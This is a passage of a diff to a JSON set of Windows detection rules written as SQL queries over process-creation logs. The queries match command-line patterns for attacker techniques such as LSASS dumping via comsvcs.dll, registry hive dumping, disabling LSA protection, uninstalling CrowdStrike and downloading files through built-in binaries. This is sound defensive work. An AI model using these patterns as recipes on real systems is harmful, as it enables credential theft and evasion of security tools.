- "tags": [ - "attack.exfiltration" - ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ldifde_export.yml" + "filename": "proc_creation_win_lolbin_ieexec_download.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1562.010" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", - "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Use Icacls to Hide File to Everyone", - "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "title": "Potential Command Line Path Traversal Evasion Attempt", + "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "status": "experimental", - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "author": "frack113", + "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1036" ], "falsepositives": [ - "Legitimate use" + "Google Drive", + "Citrix" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'iCACLS.EXE' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_icacls_deny.yml" + "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" }, { - "title": "Suspicious SYSVOL Domain Group Policy Access", - "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_sysvol_access.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "Suspicious Rundll32 Setupapi.dll Activity", + "id": "285b85b1-a555-4095-8652-a8a4106af63f", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Use of PktMon.exe", + "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_lolbin_pktmon.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", - "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "status": "test", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1220" ], "falsepositives": [ - "FQDNs that start with a number" + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (CommandLine LIKE '%/format%' ESCAPE '\\' OR CommandLine LIKE '%-format%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Format:List%' ESCAPE '\\' OR CommandLine LIKE '%Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%Format:table%' ESCAPE '\\' OR CommandLine LIKE '%Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%Format:value%' ESCAPE '\\' OR CommandLine LIKE '%Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%Format:csv%' ESCAPE '\\'))) OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_wmic_xsl_script_processing.yml" }, { - "title": "Potential SPN Enumeration Via Setspn.EXE", - "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "status": "test", - "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", - "author": "Markus Neis, keepwatch", + "title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "stable", + "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", + "author": "Markus Neis @Karneades", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.execution", + "attack.t1047", + "attack.t1059.001" ], "falsepositives": [ - "Administration activity" + "AppvClient", + "CCM", + "WinRM" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "proc_creation_win_setspn_spn_enumeration.yml" + "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" }, { - "title": "Ruby Inline Command Execution", - "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", - "status": "experimental", - "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Reg Add Open Command", + "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "status": "test", + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ruby_inline_command_execution.yml" + "filename": "proc_creation_win_reg_open_command.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "id": "eee00933-a761-4cd0-be70-c42fe91731e7", + "status": "test", + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "File Download Using ProtocolHandler.exe", - "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "title": "Windows Admin Share Mount Via Net.EXE", + "id": "3abd6094-7027-475f-9630-8ab9be7b9725", + "status": "test", + "description": "Detects when an admin share is mounted using net.exe", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "falsepositives": [ + "Administrators" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_net_use_mount_admin_share.yml" + }, + { + "title": "Suspicious New Instance Of An Office COM Object", + "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", "status": "experimental", - "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", - "author": "frack113", + "description": "Detects an svchost process spawning an instance of an office application. This happens when the 